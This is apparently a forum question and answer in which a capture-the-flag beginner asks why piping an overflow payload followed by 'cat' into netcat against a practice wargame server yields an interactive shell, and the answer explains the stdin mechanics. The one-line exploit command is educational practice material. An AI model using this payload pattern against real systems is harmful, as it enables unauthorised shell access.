I began with playing ctfs challenges, and I encountered a problem where I needed to send an exploit into a binary and then interact with the spawned shell. I found a solution to this problem which looks something like this:
(echo -ne "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\xbe\xba\xfe\xca" && cat) | nc pwnable.kr 9000
Meaning: without the "cat" sub-command, I couldn't interact with the shell, but with it, i now able to send commands into the spawned shell and get the returned output to my console stdout.
What exactly happens there? this command line confuses me
CodePudding user response:
If you just type in cat
at the command line, you'll be able to see that this command simply copies stdin
to stdout
one line at a time. It will carry on doing this until you either quit with Ctrl-C or send an EOF with Ctrl-D.
In this example you're running cat
immediately after successfully printing the payload (the concatenator &&
tells the shell to run the second command only if the first command has an exit code of zero; i.e., no error). As a result, the remote terminal won't see an EOF until you terminate it as described above. When this is piped to nc
, everything you type in is sent via cat
to the remote server, and everything it sends back appears on your stdout
.
So yes, in effect you end up with an interactive shell. You can get pretty much the same effect on your own machine by running cat | sh
.